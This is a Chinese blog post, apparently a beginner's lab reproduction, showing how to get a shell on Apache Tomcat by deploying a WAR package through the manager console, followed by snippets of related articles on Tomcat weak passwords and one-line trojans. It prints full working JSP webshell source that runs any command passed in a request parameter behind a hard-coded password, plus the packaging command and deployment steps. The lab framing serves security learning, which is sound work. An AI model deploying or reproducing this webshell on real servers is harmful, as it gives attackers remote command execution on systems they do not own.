Tomcat后台部署war木马getshell

最新推荐文章于 2023-12-25 15:52:15 发布
最新推荐文章于 2023-12-25 15:52:15 发布
阅读量6.9k 收藏 13
点赞数 3
文章标签: tomcat 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/109532160
版权

昨儿个面试被问到如何通过tomcat拿shell,之前只是看到,没做过复现,导致自己吃了亏,刚入渗透不久。复现的漏洞太少,经验方面还是远远不够的,一点一点来。复现过程可能比较粗糙,有什么错误还希望各位大哥给小弟指点一番。

靶场搭建:
百度一下,vulhub里边就有
漏洞复现:
进入靶场,找到后台。默认的话是在manager
在这里插入图片描述

在这里插入图片描述

准备好马,打包成war包

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>
//ps:马的出处:https://blog.csdn.net/Jerry____/article/details/103387763

执行:jar -cvf [war包名称].war 打包目录
在这里插入图片描述

a.jsp 的话是一句话木马,大家需要的话,可以自己找一下一些有用的马(我找的这个马不好用,就不做记录了)
在这里插入图片描述

上传,部署war包

在这里插入图片描述

可以看到应用列表已经出现了我们的目录:

在这里插入图片描述

访问一下:whoami 成功回显,漏洞复现算是成功了。
在这里插入图片描述

在这里插入图片描述

有些命令是回显不了的,大概是马不太行。

用哥斯拉生成了一个jsp一句话,重新部署,成功连接,拿到shell

在这里插入图片描述

Lin冲啊
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞复现】 tomcat-pass-getshell 弱口令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 493
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台部署war包geshell
Tomcat 弱口令爆破登陆 War包上传 Getshell
小晓晓晓林的博客
01-28 1245
影响版本 Tomcat全版本 环境搭建 前两篇文章有提到,这里不再赘述 尝试复现 利用burpsuite进行爆破Manager登陆页 http://10.130.3.245:8080/manager/html
Tomcat WAR部署getshell
aqi_sec的博客
07-06 2237
Tomcat WAR部署getshell
Tomcat漏洞—(CVE-2017-12615)和后台部署war文件
今天也要加油鸭
03-26 2840
文章目录一、远程代码执行漏洞(CVE-2017-12615)二、信息泄露漏洞(CVE-2017-12616)三、弱口令➕后台部署war文件 Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱...
Tomcat后台上传war包getshell复现
一瓶草莓酱的博客
03-17 3750
环境搭建 页面浏览: 漏洞简介 tomcat是apache软件基金会的核心项目,tomcat服务器是一个免费的开放源代码的web应用服务器,属于轻量级应用服务器。默认端口:8080 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上,响应消息再通过tomcat返回给浏览器。 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 图中可以看到ma
WAR木马制作
na_tion的专栏
09-06 7102
Apache tomcat manager成功登陆之后,可以通过上传WAR文件上传webshell,本文简单记录war木马制作、上传过程 一、上传过程 (1)登陆 访问http://ip:port/manager/html,成功进入上传页面,上传含小马的WAR文件 (2) 木马文件访问  菜刀成功连接http://ip:port/shell/mytest.jsp 二
tomcat+shellwar包上传后自动化部署
Songcz的博客
10-30 576
tomcat自动化部署shell 因为测试环境不能链接SVN,(这svn得挂VPN有毒),所以没法直接拉取代码…就FZ上传war包之后自动化部署吧…各种路径就不给了,头会写shell,写完还挺好用的。 直接源码吧 #/bin/bash tomcat_dir = "***" code_dir = "**" war_dir = "**" war_name = "**" #关闭tomcat杀死进程 ...
Tomcat7部署war包getshell 漏洞复现
Boom!脑洞大爆炸的博客
07-07 966
Tomcat7部署war包getshell 漏洞复现
如何在Tomcat后台通过文件上传getshell总结(个人学习笔记思路)
m0_58792545的博客
07-27 2386
关于文件上传getshell的一些思路以及细节总结
tomcat系统登录部署漏洞—msf破解及war部署getshell
Sea_Sand息禅
04-11 1883
跟着大佬学习的,如有问题,欢迎指教。 tomcat是一个很常见的java web application服务器 此次实验漏洞:很多用户在设置后台管理员账号密码的时候用了系统默认的配置,这使登录容易被破解 0x00:环境部署 1、java环境,以便运行xmapp 2、xmapp下载:https://www.apachefriends.org/index.html 3、运行xmapp的tomc...
【Vulfocus解题复现】tomcat-pass-getshell 弱口令
温氏效应
11-15 3800
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
WAR包,漏洞利用
10-16
下载了就知道了,上传后利用,需要肉鸡
tomcat and war
景山编程-顺道编程
08-28 257
1 如果放到系统目录下,需要给权限。 2 war 包 放到 webapps 目录下,就可以自动解压
Tomcat 后台文件上传一键getshll
m0_64815693的博客
02-03 2052
Tomcat 后台文件上传一键getshll
jsp,tomcat,木马,病毒,1.war
鸟哥
05-15 904
鸟哥近日在玩tomcat做一些手机wap应用,探讨手机归属地问题。具体结论,过程,技术啥的不提。不过遭遇一些攻击,这里写这个blog给用tomcat做开发的人员提个醒。 tomcat本身开源的嘛,默认的web管理员的用户名,密码,权限等,都写死在那里,如果发布时,不小心就会被黑客利用到。上图: 看前几条杀毒记录。黑客只要有tomcat管理员权限,那基本啥事都可以搞了。 分析1.war,里...
一句话木马拿下webshell
weixin_51646864的博客
01-21 1320
一句话木马拿下webshell 1、我们先建立一个简单的一句话木马文件,我们这里就命名为shell2吧。 2、因为提交的文件可能是有过滤的,我们这个靶场的这个题目就是禁止上传危险的文件类型,如jsp jar war等,所以就需要绕过过滤检测。我们这里用的方法是先将一句话木马重命名改成jpg格式,试了下jpg图片可上传。 3、开启bp抓包,设置好代理后开始拦截。bp拦截开启后,回到网页,提交刚才改好的jpg文件,然后我们就可以看到成功拦截到包。 上图可看到我们的包已经拦截下来。 4、然后我们将jpg后缀
Web安全-一句话木马
jennycisp的博客
12-25 4033
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
渗透测试-Weblogic后台部署War大马
道阻且长,行则将至。
07-14 4672
环境搭建 本环境模拟了一个真实的 Weblogic 环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对 Weblogic 场景的渗透。 环境 版本 Weblogic 10.3.6(11g) Java 1.6 漏洞环境基于 Ubuntu 虚拟机的 Vulhub 集成靶场,执行命令docker-compose up -d启动靶场容器: 后台爆破 环境启动后,访问 http://your-ip:7001/console,即为 Weblogic 后台
webshell一句话木马
Jim的博客
08-18 3059
asp一句话木马 %> "" Then execute(request("sb"))%> 补充知识: asp代码执行漏洞: Eval函数接受一个包含VBScript表达式的字符串 php一句话木马  //容错代码 @eval($_POST[sb])   //绕过
tomcat怎么部署war
最新发布
05-28
Tomcat是一个开源的Web应用服务器,可以通过部署WAR包来进行Web应用的部署。下面是Tomcat部署WAR包的步骤: 1.将WAR包放入Tomcat的webapps目录中。 2.启动Tomcat服务器。 3.等待Tomcat解压WAR包并部署应用。 4.在浏览器中输入URL,即可访问部署的Web应用。 需要注意的是,如果WAR包的名称与Web应用名称不一致,需要将WAR包的名称改为Web应用的名称。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值